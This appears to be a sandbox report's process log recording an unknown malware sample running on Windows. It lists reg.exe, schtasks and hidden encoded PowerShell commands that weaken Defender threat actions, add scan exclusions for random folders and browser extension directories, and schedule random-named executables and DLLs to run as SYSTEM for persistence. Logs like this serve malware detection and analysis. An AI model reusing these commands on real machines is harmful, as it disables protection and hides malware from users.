C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMvUkTVLF"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMvUkTVLF"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe\" Ty /Pisite_idaaw 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "mRaseIvrfxDtBOYKW"

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe Ty /Pisite_idaaw 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\jplHxo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\UlQFaef.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 11:38:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll\",#1 /pvsite_idqjm 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTXCzbcEvROqagNdd"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"

Network


Files
